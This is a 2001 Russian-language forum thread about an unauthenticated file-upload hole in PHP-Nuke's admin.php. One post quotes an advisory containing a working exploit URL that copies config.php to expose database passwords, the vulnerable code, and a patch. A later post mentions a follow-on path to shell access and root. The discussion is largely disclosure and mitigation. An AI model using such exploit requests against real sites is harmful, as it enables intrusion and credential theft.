Bozo Silver Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Обнаружена опасная дыра в программе PHP-Nuke, которая используется на сотнях тысяч веб-сайтов   http://www.linuxcenter.ru/news.phtml?#560 Всего записей: 2707 | Зарегистр. 27-06-2001 | Отправлено: 03:22 12-10-2001 | Исправлено: Bozo, 03:24 12-10-2001

Shelter Shelter™ Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору Bozo Конкретно знаешь что-нибудь? На Linuxcenter написано очень расплывчато, а больше никто об этом ничего не пишет. PHP Nuke.org обычно быстро реагирует. ---------- Кто сверяет свое поведение с общественным мнением, тот не уверен в своих силах (с) /Мармонтель/ Всего записей: 17948 | Зарегистр. 21-09-2001 | Отправлено: 03:45 12-10-2001

voll Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору TWLC ссылается на IDG, а там:   The details about the security hole was published by a hackergroup called TWLC, last month with a message asking for that it shouldnt be used. Then Beyond Security have camed with a updated description of the securityhole.   A message from the 24 september, on PHP-Nukes website said that the securityhole be fixed, in the next version of the program. Until then they recommended for ou who run the system to modify the file admin.php and close all stuff about uploading of files. A temporary securityfix has been published on the website.   Т.е. это та самая дыра, о которой мы говорили тут три недели назад. Всего записей: 656 | Зарегистр. 16-07-2001 | Отправлено: 10:07 12-10-2001

Shelter Shelter™ Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору voll Спасибо за уточнение. На Linuxcenter опубликовано 11 октября... задержались ребята. ---------- Кто сверяет свое поведение с общественным мнением, тот не уверен в своих силах (с) /Мармонтель/ Всего записей: 17948 | Зарегистр. 21-09-2001 | Отправлено: 11:33 12-10-2001

Stek Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Гм... мне еше раз пароль к базе дать ??? Дыра, дыра... при нормальных настройках сервера никакая это не дыра. ---------- Интернет и деньги без дураков Портабл программы, Бесплатные знакомства Всего записей: 1544 | Зарегистр. 19-09-2001 | Отправлено: 11:56 12-10-2001

Shelter Shelter™ Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору Stek Цитата: Дыра, дыра... при нормальных настройках сервера никакая это не дыра. Давай закроем эту тему . Уже достаточно обсудили. Сайтов на PHP Nuke за сто тысяч по миру... Что значит, нормальные настройки сервера?! ---------- Кто сверяет свое поведение с общественным мнением, тот не уверен в своих силах (с) /Мармонтель/ Всего записей: 17948 | Зарегистр. 21-09-2001 | Отправлено: 12:03 12-10-2001 | Исправлено: Shelter, 12:06 12-10-2001

Stek Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Молчу, молчу ---------- Интернет и деньги без дураков Портабл программы, Бесплатные знакомства Всего записей: 1544 | Зарегистр. 19-09-2001 | Отправлено: 13:06 12-10-2001

FatCat Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Фигня. Давно уже прикрыто. ---------- Портал Rolemancer http://www.rolemancer.ru Всего записей: 346 | Зарегистр. 10-07-2001 | Отправлено: 20:15 12-10-2001

LeftSome Junior Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору А вот как страшно написано   Vulnerable systems: PHP-Nuke 5.2 and prior   Immune systems: PHP-Nuke 5.0 RC1 (only this one)   Exploit: First run the following URL: http://www.example.net/admin.php?upload=1 &file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php &userfile_name=hacked.txt (NOTE: URL wrapped for readability)   Then access the created file: http://www.example.net/images/hacked.txt   And you will see config.php that contains the DB passwords. Any other file can be copied just as easily.   Vulnerable code: The admin.php contains this routine:   $basedir = dirname($SCRIPT_FILENAME); $textrows = 20; $textcols = 85; $udir = dirname($PHP_SELF); if(!$wdir) $wdir="/"; if($cancel) $op="FileManager"; if($upload) {     copy($userfile,$basedir.$wdir.$userfile_name);     $lastaction = ""._UPLOADED." $userfile_name --> $wdir";     // This need a rewrite -------------------------------------> OMG! WE AGREEEEEEEE lmao     //include("header.php");     //GraphicAdmin($hlpfile);     //html_header();     //displaydir();     $wdir2="/";     chdir($basedir . $wdir2);     //CloseTable();     //include("footer.php");     Header("Location: admin.php?op=FileManager");     exit; }   That does not do a check to see if you are logged as admin or not, so you can use it without any authentication.   Solution: A temporary solution would be to change: "if($upload) {"   To   "if (($upload) && ($admintest)) {" Всего записей: 57 | Зарегистр. 09-10-2001 | Отправлено: 17:01 13-10-2001

voll Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Но я не написал главного - есть и вторая часть этого эксплоита, которая позволяет загрузить на веб сервер любой файл. Затем остается загрузить два скриптика - и вы можете выполнять команды шелл на пораженном сервере.   По поводу дальнейших инструкций - переходите на форум где учат, имея шелл на удаленном компьютере, получить права root   Может автор письма где-то и привирает, но звучит серьезно. Всего записей: 656 | Зарегистр. 16-07-2001 | Отправлено: 16:10 14-10-2001

Компьютерный форум Ru.Board » Тематические » Системы управления сайтами » "А мужики-то не знают..."©

Переход по форумам  Закладки   » Компьютеры Цифровое изображение Программы Microsoft Windows UNIX Другие OS Hardware В помощь сисадмину Прикладное программирование Игры Форумные игры   » Интернет Web-программирование В помощь вебмастеру Графика Хостинг Зацените-ка!   » Тематические Ikonboard v.2 Ikonboard v.3 Invision Board Другие форумы PHP-Nuke и другие порталы Мобила   » Общие Спорт Флейм Темы по региональным встречам Музыка и Кино Юмор Литература и Живопись   » Ru.Board Новости Помощь по форуму   » Андеграунд eBookz Варезник Раздачи и акции Мобильный варезник Андеграунд Игры и фильмы   » Специальные Тестирование